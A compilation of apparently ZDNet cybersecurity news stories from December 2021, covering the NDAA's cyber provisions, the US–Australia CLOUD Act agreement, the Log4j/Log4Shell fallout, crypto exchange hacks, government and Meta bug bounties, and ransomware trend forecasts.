Information Technology

The US Senate passed the The National Defense Authorization Act (NDAA) on Wednesday, approving the $768 billion annual defense spending bill that was packed with cybersecurity provisions. The bill now heads to the desk of President Joe Biden. In an explainer document released alongside the text of the bill, the US House of representatives armed services committee said the cyber provisions in the bill would initiate “the widest empowerment and expansion of CISA through legislation since the SolarWinds incident.” In addition to significantly more cybersecurity investments, the bill gives greater budget authority to the Commander of US Cyber Command, “modernizes” the relationship between the Department of Defense Chief Information Officer and the National Security Agency’s components responsible for cybersecurity while also establishing a program office within Joint Forces Headquarters-DODIN to centralize the management of cyber threat information products across the Defense Department. The bill also mandates the first taxonomy of cyber weapons and cyber capabilities and requires the Defense Secretary to create a software development and acquisition cadre to assist with developing and acquiring software by providing expert advice, assistance, and resources. A grant program created by Congress will fund cybersecurity research in coordination with Israel. A National Cyber Exercise program is also outlined in the bill. It will force CISA and other government bodies to test the National Cyber Incident Response Plan and, “to the extent practicable, simulate the partial or complete incapacitation of a government or critical infrastructure network resulting from a cyber incident.” An amendment also requires CISA to update its incident response plan at least every two years. The DOD is now required to submit a report on how its Cybersecurity Maturity Model Certification program affects small businesses thanks to the bill. Experts also touted the addition of the apprentice program to expand the available cyber talent as well as the Veteran training program. CISA is given more funding for a program called “CyberSentry” that provides “continuous monitoring of cybersecurity risks to critical infrastructure that own or operate industrial control systems that support national critical functions.”

Bill Lawrence, CISO at SecurityGate, said CyberSentry was a somewhat controversial provision because it says CISA “may access all network traffic, including the content of communications, as stored within the CyberSentry stack to further analyze the origins of an alert and/or evaluate the state of the network.”  “There are valid reasons for CISA to help protect US critical infrastructure just as their are valid reasons for CI owners and operators to not want government sensors on their networks, as well as valid arguments from security providers that the government is giving cyber services away for free (using taxpayer money, of course),” Lawrence said. “DHS does include a great deal of privacy considerations in the CyberSentry write-up.  It would be helpful to also read about the tactical and strategic objectives of this program and see if rapid information sharing with all CI asset owners and operators is included, and help determine if this juice is worth the squeeze on the commercial providers. I have my apprehensions.” But what garnered the most interest was what the bill was lacking, namely a cyber incident reporting provision that was hotly debated and ultimately scuttled at the last minute. For months, Democratic and Republican Senators jockeyed over the language of a cyber incident reporting provision in the NDAA. In November, two Democrats — Gary Peters and Mark Warner — worked alongside two Republicans — Rob Portman and Susan Collins — to introduce a new amendment to the NDAA that would have forced critical infrastructure owners and operators as well as civilian federal agencies to report all cyberattacks and ransomware payments to CISA.But by December, The Washington Post reported that Florida Senator Rick Scott took issue with the ransomware reporting provision and called it too broad, asking senators to limit the language to enterprises in the 16 critical industries. Sources told CyberScoop’s Tim Starks that debate over the ransomware language ran too long and negotiators in the House and Senate ended up leaving the entire provision out. Lawrence noted that some companies had issues with reporting breaches or ransomware attacks within 72 hours of discovery and ransom payments within 24 hours of payout. He explained that smaller organizations do not have 24/7 security operations center available to them which limits their ability to respond to such incidents, much less tell the US government what is happening during incident response. Rep. Bennie Thompson and Rep. Yvette Clarke noted that cybersecurity incident response legislation was included in the House NDAA which passed in September. The two — who respectively serve as Chairman of the Committee on Homeland Security and Chairwoman of the Subcommittee on Cybersecurity, Infrastructure Protection, & Innovation — explained in a statement that there were intensive efforts to get cyber incident reporting in the bill but “ultimately the clock ran out on getting it in the NDAA.” “There was dysfunction and disagreement stemming from Senate Republican leadership that was not resolved until mid-morning today – well past the NDAA deadline. This result is beyond disappointing and undermines national security,” Thompson and Clarke said. “We had hoped to mark the one-year anniversary of the discovery of the SolarWinds supply chain attack by sending cyber incident reporting legislation to the President’s desk. Instead, Senate Republican leaders delayed things so significantly that the window closed on getting cyber incident reporting included in the NDAA. We are profoundly disappointed that the momentum we had coming into the NDAA did not yield success but are fully committed to working across the aisle and with the Senate to find another path forward.”  More

Australia and the United States have entered into a landmark CLOUD Act agreement to bolster efforts in preventing serious organised crime, terrorism, ransomware attacks, critical infrastructure sabotage, and child sexual abuse. The Clarifying Lawful Overseas Use of Data Act, known as the CLOUD Act, is a US legal instrument that allows for law enforcement to access data across borders. “Signing the CLOUD Act Agreement will enable our two nations’ law enforcement agencies to share important digital information and data with each other, under carefully defined legal authorities and safeguards,” said Karen Andrews, Australia’s Minister of Home Affairs. Through the bilateral agreement, Australia’s law enforcement agencies gain the ability to issue orders compelling US service providers to provide communications data for the purposes of combatting serious crime directly on US-based companies, and vice versa. Previously, Australian law enforcement agencies could only rely on mechanisms such as mutual legal assistance agreements to access crucial evidence from other countries, which have been flagged as complex and time-consuming by Home Affairs. It’s the second CLOUD Act agreement to come into force, after a similar one was finalised between the UK and US in 2019. “This agreement paves the way for more efficient cross-border transfers of data between the United States and Australia so that our governments can more effectively counter serious crime, including terrorism, while adhering to the privacy and civil liberties values that we both share,” said US Attorney-General Merrick Garland.

Australia and the US have been working on an agreement since 2019, but Australia needed to implement other legislation over the past two years in order to establish the required framework for a CLOUD Act agreement to exist. Over that span, the Australian government has faced scrutiny over its push for a CLOUD Act agreement, with privacy advocates like Australian Privacy Foundation saying such an agreement “conflated bureaucratic convenience with what is imperative”.The CLOUD Act agreement comes off the heels of Australia announcing various initiatives in recent months to prevent crime. In December alone, Australia has announced the Online Safety Youth Advisory Council, passed “Magnitsky-style” and Critical Infrastructure cyber attack laws, commenced work on electronic surveillance law reforms, and proposed anti-trolling laws. The Australian government also started work on a new ransomware plan back in October.While some of those initiatives have drawn praise, others have drawn criticism for being rush jobs and lacking nuance.  The bilateral agreement will now undergo parliamentary and congressional review processes in both countries before it is finalised. Related Coverage More

As the fallout from the Log4j vulnerability continues, cybersecurity experts are debating what the future might hold. Tom Kellermann, VMware’s head of cybersecurity strategy, said the Log4j vulnerability is one of the worst vulnerabilities he has seen in his career — and one of the most significant vulnerabilities ever to been exposed.Log4j, a Java library for logging error messages in applications, was developed by the Apache Software Foundation. Kellermann called Apache “one of the giant supports of the bridge between the world’s applications and compute environments,” adding that the exploitation of Log4j will “destabilize that support and… destabilize the digital infrastructure that’s been built on top of it.” 

more coverage

But his greatest concern is that someone further weaponizes the vulnerability by creating a worm, which Kellermann described as a polymorphic type of malware that can essentially spread on its own. “One of the most significant [worms] from back in the early 2000s was Code Red,” Kellermann told ZDNet. “We haven’t seen a widespread global impact like that since then. If this vulnerability were to be weaponized by one of the cyber communities — whether it be intelligence services, one of the four major rogue powers in cyber, or one of the major cybercrime cartels — that’s when things will get more interesting.” The possibility of a worm has generated significant conversation in the cybersecurity community. Cybersecurity expert Marcus Hutchins called fears of a worm “overblown” in multiple Twitter threads.  “Firstly, there’s already mass exploitation (you can spray the entire internet from one server). Secondly, worms take time and skill to develop, but most attackers are racing against the clock (patching and other attackers),” Hutchins wrote on Twitter. 

He added that “a worm would need a novel exploitation technique to gain any real value over scanning,” In another thread, Hutchins wrote that 2017’s WannaCry ransomware attack “gave people a way overinflated sense of the threat posed by worms,” adding that worms “aren’t a worst case scenario (or even a worse case scenario) for most exploits.” “It’s not a case of there’s an exploit so there will be a worm (we never saw worms for any of the recent wormable RCEs and even if we had it’d be no worse than regular exploitation). WannaCry was written by North Korea, using an NSA exploit, stolen by Russia. Not the norm,” Hutchins explained. Steve Povolny, head of advanced threat research for McAfee Enterprise and FireEye, told ZDNet that his biggest concern is around “wormability,” adding that he couldn’t “think of a worse scenario for Log4j exploits than malicious code that can replicate and spread itself with incredible speed, delivering ransomware payloads.”Povolny said worms like WannaCry demonstrated the type of impact that cybersecurity experts could expect, noting that even the WannaCry example was cut short from its true potential for spread and disruption due to a “kill switch.””We can’t hope to get as lucky this time — it’s not a matter of if, it’s a matter of when this will happen. Organizations of all sizes must be undergoing an aggressive reconnaissance and patching strategy while there is still time,” Povolny said. “If you ever watched the TV show ‘The Amazing Race’, it now seems to pale in comparison to the global race taking place as a result of Log4Shell [the vulnerability’s nickname]. Even as thousands of organizations worldwide continue to search for and patch this exceptional vulnerability, threat actors are working at a furious pace to weaponize and further refine exploits for the flaw.” Others, like BreachQuest CTO Jake Williams, said that while it is a certainty someone will create a worm that abuses the Log4Shell, it is unlikely to be like WannaCry, NotPetya, or previous worms that abuse system level processes. 

The vast majority of servers vulnerable to Log4Shell will be running the vulnerable process with very limited permissions, Williams explained, adding that in most cases, a worm exploiting Log4Shell would probably not be able to achieve persistence across process restarts. Because the process probably doesn’t have filesystem permissions, Williams said people should be less worried about ransomware payloads. “A malicious process can’t encrypt what it can’t write in the first place. While we should absolutely expect a Log4Shell worm to be created, we shouldn’t conflate the expected damage of a worm with what has been seen in previous high profile worms,” Williams said. Salt Security vice president Yaniv Balmas said his team is already seeing cases where the Log4Shell vulnerability is used by “common” cybercrime-related operations in order to spread ransomware, calling a wormable exploit a “valid scenario.” Balmas noted that even today, the world is still seeing artifacts from similar worms that were launched years ago. If someone decides to embed this vulnerability into a worm, Balmas said it would be “almost impossible to stop once it reaches a critical mass.””However, while not neglecting the impact of such a worm, that might not be the worst scenario because of the unbelievable easiness that this attack can be applied. Everyone with a basic computer and internet access could launch an attack against millions of online services within minutes,” Balmas said. Thankfully, some cybersecurity experts said the head start in dealing with detection, mitigation, and patching will help as they prepare for the worst. John Bambenek, principal threat hunter at Netenrich, said a worm would have been far worse last week. But the industry-wide work being done made sure many of the most vulnerable machines are in a better place. Others said that while the vulnerability is wormable, there has been no evidence to suggest this is a priority for threat actors at this time. Worms also require a significant amount of time and effort to develop, according to Digital Shadows senior analyst Chris Morgan. “This activity differs from the WannaCry incident, which saw a perfect storm of a highly exploitable vulnerability coinciding with an NSA-level exploit breach in EternalBlue. It’s still very much early days with regards to Log4j,” Morgan said. “While many threat actors will likely be at different stages of the kill chain, most actors will likely still be scanning for susceptible systems, attempting to establish a foothold, and identifying further opportunities, depending on their motivations. Efforts among actors at this stage are rushing to exploit before companies have a chance to patch, rather than spending time developing a worm.”Vectra CTO Tim Wade echoed that sentiment, noting that the Log4j vulnerability is still mostly at risk from attack by creative and adaptive human adversaries that may leave fewer fingerprints behind them as they undertake less overt attacks — such as extracting cryptographic secrets or API keys for present or future campaigns.  While a worm enabling further mass exploitation is problematic, Wade said less direct attacks “may introduce more lasting damage when they go undetected for great lengths of time.” More

Crypto platform AscendEX has pledged to reimburse their customers, who lost a total of $77.7 million in a hack on December 11.In a series of Tweets, the company said it is in the process of “standing up a new hot wallet infrastructure” and estimated that deposits and withdrawals would resume over the next two days. 

“Doing right by our customers is our obligation. Any impacted customers will be 100% reimbursed for their losses. Especially in the cryptocurrency industry, where community is the driving force of innovation, it is important for AscendEX to always remain true to our users,” the company said. “We plan to resume withdrawals gradually, beginning with Ethereum. Any user that wishes to withdraw their assets will be permitted to do so in an uninterrupted capacity once withdrawals reopen for the particular coin or token.”Blockchain security company PeckShield estimated that $77.7 million in total was taken across three chains: $60 million from Ethereum, $9.2 million from Binance Smart Chain, and $8.5 million from Polygon.The hack began on Saturday at 5pm EST when the company saw a number of unauthorized transfers from one of their hot wallets. The cold wallets were unaffected, and the company transferred all other assets there as they investigated the attack. Blockchain analytics firms were hired to help with the response, and law enforcement was notified. AscendEX contacted other crypto exchanges so that wallets involved in the theft could be blacklisted. It pledged to release a security post-mortem report in the coming days.

AscendEX is based in Singapore and closed a $50 million Series B funding round in November, with investments from Polychain Capital, Jump Capital, Alameda Research, and others. The company was founded in 2018 under the name “Bitmax” before switching to AscendEX.CoinDesk reported that the company claims to have more than one million retail and institutional clients. It has reportedly reached an average daily trading volume of more than $200 million.The AscendEX losses became the latest in a series of headline-grabbing attacks with eye-popping numbers. On Sunday, blockchain gaming company Vulcan Forged said around $140 million had been stolen from their users. They, too, were forced to reimburse victims. Last week, Crypto trading platform BitMart released an update on the devastating security breach that caused about $200 million in losses, writing that the breach was “mainly caused by a stolen private key that had two of our hot wallets compromised.”Hackers have repeatedly attacked cryptocurrency and DeFi platforms over the last year. Just last month, cybercriminals stole about $120 million from DeFi platform Badger. Other attacks in 2021 include thefts of more than $600 million from Poly in August and $34 million from Cream Finance in September. In May, about $200 million was stolen from the PancakeBunny platform. The Record and Comparitech keep running tallies of cyberattacks on cryptocurrency platforms, noting recent attacks on Liquid, EasyFi, bZx, and many other platforms.  More

Meta has announced an expansion to its bug bounty platform to include vulnerabilities that can be abused for data scraping. 

On Wednesday, the company – recently rebranded from Facebook – said that the two new areas of research revolve around scraping bugs and scraped databases containing user information. Dan Gurfinkel, Security Engineering Manager, said that the inclusion of valid scraping bugs and exposed data sets in a bug bounty program are, to the firm’s knowledge, an “industry first.”  Meta/Facebook has been involved in numerous incidents around user data scraping. The most well-known is the Cambridge Analytica scandal, in which the data of up to 87 million users was scraped and shared without their consent.  More recently, information belonging to approximately 553 million Facebook users was dumped online. Meta said the mass data collection took place in 2019.  “We know that automated activity designed to scrape people’s public and private data targets every website or service,” Gurfinkel says. “We also know that it is a highly adversarial space where scrapers — be it malicious apps, websites or scripts — constantly adapt their tactics to evade detection in response to the defenses we build and improve.”To assist the company in fixing data-scraping issues across its apps and services rapidly, Meta is looking for reports on vulnerabilities that allow scraping limit mechanisms to be bypassed and those that permit scraping “at a greater scale than the product intended.” In particular, Meta is urging researchers to look for logic bypass issues, although rate limiting errors are in-scope, too. 

Scraped databases will include reports of unprotected and open public databases, discovered online, which contain at least 100,000 records of unique users, as well as sensitive information such as email addresses and phone numbers.  Financial rewards starting at $500 are on offer for scraping bugs and scraped database reports will be matched with charity donations. Feedback will be sought from the firm’s “top” bug bounty hunters before expansion.   Gurfinkel also outlined the company’s progress with bug bounties. Since 2011, the program’s launch, over 150,000 bug reports have been received and over 7,800 have been awarded a bounty payment. In total, Meta has now paid out over $14 million.  Over the course of 2021, Meta has awarded $2.3 million to researchers for 800 vulnerability reports out of approximately 25,000.  Earlier this month, Meta increased the scope of Facebook Protect, a service designed to enhance the security of user accounts considered to be at higher risk of compromise by threat actors.  By the end of this year, Facebook Protect should be rolled out to over 50 countries. In the same way as Google and Microsoft, Meta offers this service to individuals including lawyers, journalists, civil rights organization members, and political figures.  Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

The US Department of Homeland Security is launching its own bug bounty program to help find and correct gaps in its systems. 

more coverage

The new “Hack DHS” program was made official by Homeland Security Secretary Alejandro Mayorkas in a press release on the agency’s website after it was revealed at the recent Bloomberg Technology Summit and covered by The Record. The program promises to pay out between $500 and $5,000 to “vetted cybersecurity researchers who have been invited to access select external DISH systems.” The actual payout will be based on the severity of the specific vulnerability discovered.As noted by DHS, this new bounty program builds on similar private-sector efforts and “Hack the Pentagon,” a first-of-its-kind program launched in 2016 that was ultimately responsible for identifying over 100 vulnerabilities across various Defense Department assets. The DHS itself created a similar pilot program in 2019 on the back of a bipartisan bill. It followed related efforts from the Department of Defense, Air Force, and Army. “The Hack DHS program incentivizes highly skilled hackers to identify cybersecurity weaknesses in our systems before they can be exploited by bad actors,” Mayorkas noted. The effort will include three phases that will run throughout FY 2022. In the first phase, hackers will be called on to conduct “virtual assessment” on select DHS systems. This will be followed by a “live, in-person hacking event” during phase two, and an identification and review process during the third and final phase. The DHS noted that it will use the data collected during this process to both plan for future bug bounties, and to develop “a model that can be used by other organizations across every level of government to increase their own cybersecurity resilience.” Like previous government programs of a similar nature, this one will be governed by rules orchestrated by the DHS’ Cybersecurity and Infrastructure Security Agency (CISA), with all participants required to fully disclose any information that could be useful in mitigating and correcting the vulnerabilities they discover. 

The hope for programs like this one is to privately discover and patch holes without relying on external security researchers or random discoverers to do the scrupulous thing and inform the vendor/agency before releasing a vulnerability into the wild. This effort appears particularly timely in a world where governments, businesses, and just about everyone that owns a computer continue to deal with the fallout from the very public disclosure and rapid exploitation of the Log4j vulnerability.  More

Ransomware is now a primary threat for businesses, and with the past year or so considered the “golden era” for operators, cybersecurity experts believe this criminal enterprise will reach new heights in the future. 

more coverage

Kronos. Colonial Pipeline. JBS. Kaseya. These are only a handful of 2021’s high-profile victims of threat groups including DarkSide, REvil, and BlackMatter. According to Kela’s analysis of dark web forum activity, the “perfect” prospective ransomware victim in the US will have a minimum annual revenue of $100 million and preferred access purchases include domain admin rights, as well as entry into Remote Desktop Protocol (RDP) and Virtual Private Network (VPN) services.  Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains.  Ransomware infection is no longer an end goal of a cyberattack. Instead, malware families in this arena — including WannaCry, NotPetya, Ryuk, Cerber, and Cryptolocker — can be one component of attacks designed to elicit a blackmail payment from a victim organization.  Cisco Secure calls current ransomware tactics “double-extortion.” Victims will have their systems encrypted in one facet of an attack, and a ransom note will demand payment, normally in Bitcoin (BTC). However, to pile on the pressure, ransomware groups may also steal corporate data before decryption and will threaten to publish or sell on this information, too, unless a payment is agreed upon and made.   The European Union Agency for Cybersecurity (ENISA) said there was a 150% rise in ransomware attacks between April 2020 and July 2021. According to the agency, we are experiencing the “golden era of ransomware,” in part due to multiple monetization options. 

This is particularly notable in “Big Game hunting” when ransomware operators will specialize in going after large and profitable companies.  With this in mind, what can we expect from ransomware operators in 2022? Ransomware-as-a-Service will continue to climbRansomware-as-a-Service (RaaS) is an established industry within the ransomware business, in which operators will lease out or offer subscriptions to their malware creations to others for a price — whether this is a per month deal or a cut of any successful extortion payments.  Considering the lucrative nature of RaaS and the difficulty of tracking down and prosecuting operators, it should come as no surprise that many security experts believe this business model will continue to flourish in 2022.  “We’re going to see a continued increase in the severity and volume of ransomware attacks,” commented Andy Fernandez, senior product marketing manager at HPE company Zerto. “In response, we will see a growth in the ransomware-as-a-service market, which is able to propagate new versions and new methods in a much faster way than before. Whether you are a small business or large enterprise, at some point, you will be targeted by a ransomware attack that will try to get into your system and encrypt your critical data.” Increased attack risk 

ZDNet Recommends

An emerging trend documented by CrowdStrike is multiple attacks leveraged against organizations once they have been successfully compromised. Data exfiltration and extortion go hand-in-hand, and according to CTO Mike Sentonas, in addition to the threat of sensitive data becoming public, “some criminals have been known to sell files to each other or even to a competitor in a foreign market.”  “This means that even if a company has paid one criminal gang, another could emerge from the shadows and demand precisely the same thing,” Sentonas says.   Other experts, including those from Picus Security, suggest that we may see more extortion methods become commonly employed – such as launching Distributed Denial-of-Service (DDoS) attacks or the harassment of customers and partners.  Pay to stay away?Another potential method of extortion we may see next year is that of companies paying operators not to attack them. Joseph Carson, Chief Security Scientist at ThycoticCentrify, suggests that while RaaS is already in full swing, “ransomware could even evolve further into a subscription model in which you pay the criminal gangs to not target you.”See also: The Great ResignationThe COVID-19 pandemic has, perhaps permanently, changed the face of work. Many of us were forced to work from home and have now adopted home office setups — and in many cases — have decided to resign from existing posts to pursue other opportunities.  Thales believes that in 2022, what is known as The Great Resignation will also have ramifications for cybersecurity, predicting a “direct correlation between staff turnover and cyber incidents.” Also: Hybrid work here to stay: What does that mean for security?According to the firm, organizations that have already lost staff will have to train new employees unfamiliar with existing protocols and may not have adequate levels of security awareness.  Business ecosystems contain many different processes, partners, and software, which may increase the risk of a business becoming compromised, and ransomware may be one of the top threats companies face today.  “There is also the issue of fatigued or disgruntled workers,” Thales says. “Even if they are not malicious, they may be increasingly lax in following employee guidelines. In 2022, the cost to replace an employee needs to go beyond recruitment and training costs. And after the rush to fill seats, organizations need to double down on training and onboarding.” Also: Everyone is burned out. That’s becoming a security nightmareGoing quantum?BlackBerry CISO John McClurg predicts that emerging technologies may also have an impact on how ransomware is used in 2022 and beyond.  Quantum computing, the concept of using quantum physics to enhance a computer’s ability to perform calculations, could be one of these areas. While outside of the realm of most attackers, McClurg says that leaps forward in quantum computing could also be leveraged to develop new attack vectors.  Also: Hackers could steal encrypted data now and crack it with quantum computers later, warn analysts”One of the more controversial uses of quantum computing is its potential to break public-key cryptography,” the executive explained. “In just a few short years, security information stored by national and international intelligence will be easily decrypted through a powerful quantum computer. This will leave highly sensitive data vulnerable to threat actors, causing an enormous potential for widespread security breaches.” Also: Spy chief’s warning: Our foes are now ‘pouring money’ into quantum computing and AIImplications for cyber insurance

ZDNet Recommends

The best cyber insurance

The cyber insurance industry is likely to go mainstream and is a simple cost of doing business. Here are a few options to consider.

Read More

The explosion in high-profile ransomware attacks is also potentially going to cause massive shifts in cyber insurance, premiums, and whether or not ransomware incidents will be covered at all.  Also: What is cyber insurance? What it covers and how it worksWith blackmail payouts now reaching millions of dollars, insurers are likely to re-examine if coverage can be offered — and if so, will impose strict requirements in what cases a policy will payout. This may include bans on paying a ransom entirely, forcing applicants to adhere to industry-accepted security standards, agreeing to consist employee training, and more.  Ritesh Singhai, Senior Director, EMEA Solutions at Secureworks, told ZDNet that there will be a “watershed” moment for cyber insurance providers in the future, and coverage for some threats — including ransomware — will become “prohibitively expensive.”Also: Cyber insurance might be making the ransomware crisis worse, say researchers”None of this will fundamentally change the threat that organizations face, although the challenges around recouping a loss may change the risk calculation, increasing the value of effective preparation and incident response plans,” Singhai added. Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

State-sponsored hackers from China, Iran, North Korea and Turkey have started testing, exploiting and using the Log4j bug to deploy malware, including ransomware, according to Microsoft.    As predicted by officials at the US Cybersecurity and Infrastructure Security Agency (CISA), more sophisticated attackers have now started exploiting the so-called Log4Shell bug (CVE-2021-44228), which affects devices and applications running vulnerable versions of the Log4j Java library. It’s a potent flaw that allows remote attackers to take over a device after compromise. CISA officials on Tuesday warned that hundreds of millions of enterprise and consumer devices are at risk until the bug is patched.  LOG4J FLAW COVERAGE – WHAT YOU NEED TO KNOW NOW The bulk of attacks that Microsoft has observed so far have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers.  “The vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems,” Microsoft said. Its ease of exploitation and wide distribution in products makes it an attractive target for sophisticated criminal and state-sponsored attackers.  It is this latter group that has now started exploiting the flaw. 

“This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives,” Microsoft said. Microsoft has turned the spotlight on the Iranian hacking group it tracks as Phosphorous, which recently ramped up their use of file-encryption tools to deploy ransomware on targets. The group has acquired and modified the Log4j exploit for use, according to the Microsoft Threat Intelligence Center (MSTIC). “We assess that Phosphorus has operationalized these modifications,” the MSTIC notes.  Hafnium, a Beijing-backed hacking group behind this year’s Exchange Server flaws, has also been using Log4Shell to “target virtualization infrastructure to extend their typical targeting.” Microsoft saw the systems used by Hafnium employing a Domain Name Server (DNS) service to fingerprint systems.  The Log4Shell bug was disclosed by the Apache Software Foundation on December 9. CERT New Zealand reported the bug was actively being exploited. Apache released a patch last week. However, vendors including Cisco, IBM, Oracle, VMware and others still need to integrate the patch into their own affected products before customers can deploy them.    MSTIC and the Microsoft 365 Defender team also confirmed that “access brokers” – gangs who sell or rent access to compromised machines – have been using the Log4j flaw to gain a foothold in target networks on both Linux and Windows systems. This sort of access is frequently sold on to ransomware gangs looking for victims; security firm BitDefender reported that a new ransomware strain called Khonsari is already attempting to exploit the Log4j bug.  CISA yesterday published its list in GitHub of products affected by the Log4Shell flaw, following a similar list by the Netherlands cybersecurity agency (NCSC) published earlier this week. CISA lists the vendor, product, versions, status of vulnerability, and whether an update is available. LOG4J FLAW COVERAGE – HOW TO KEEP YOUR COMPANY SAFE The US list will be a handy tool for organizations as they patch affected devices, in particular US federal agencies that were ordered by CISA, a unit of the Department of Homeland Security, yesterday to test which internal applications and servers are vulnerable to the bug by December 24.  Cisco customers will be busy over the next few weeks as it rolls out patches. Just looking at, for example, Cisco’s list of affected products highlights the work ahead for agency teams that must enumerate affected systems ahead of the Christmas break. CISA’s list also includes an extensive array of affected VMware virtualization software tools, most of which don’t have a patch available yet.   Dozens of Cisco software and network products are affected. Cisco released a patch for Webex Meetings Server yesterday. The Cisco CX Cloud Agent Software also got a patch.  Other affected Cisco products without a patch include Cisco’s AMP Virtual Private Cloud Appliance, its Advanced Web Security Reporting Application, Firepower Threat Defense (FTD), and Cisco Identity Services Engine (ISE). Several network infrastructure management and provision products are also vulnerable, with patches scheduled for December 21 and onwards.  More